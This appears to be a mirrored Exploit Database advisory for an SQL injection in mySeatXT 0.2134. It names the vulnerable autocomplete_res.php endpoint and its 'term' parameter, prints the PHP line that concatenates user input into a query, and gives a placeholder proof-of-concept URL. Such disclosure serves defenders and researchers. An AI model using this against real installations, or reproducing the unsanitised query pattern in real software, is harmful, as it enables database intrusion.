mySeatXT 0.2134 – SQL Injection

• Exploit Database
• 108 阅读

• 作者： vinicius777
  日期： 2014-01-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/31144/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28

  ######################################################################################## [+] Exploit: mySeatXT 0.2134 # [+] Author: vinicius777 # [+] Contact: vinicius777 [AT] gmail@vinicius777_ # [+] Vendor Homepage: http://sourceforge.net/projects/myseat# ########################################################################################     [1] Sql Injection   PoC: http://localhost/mySeatXT/web/ajax/autocomplete_res.php?term=99' ['SQL INJECT']       Vulnerable Code: [+] autocomplete_res.php     $sql = "SELECT * FROM reservations WHERE reservation_guest_name LIKE '".$_GET['term']."%' GROUP BY reservation_guest_name "; $fetch = mysql_query($sql);       # # # Greetz to g0tm1lk and TheColonial.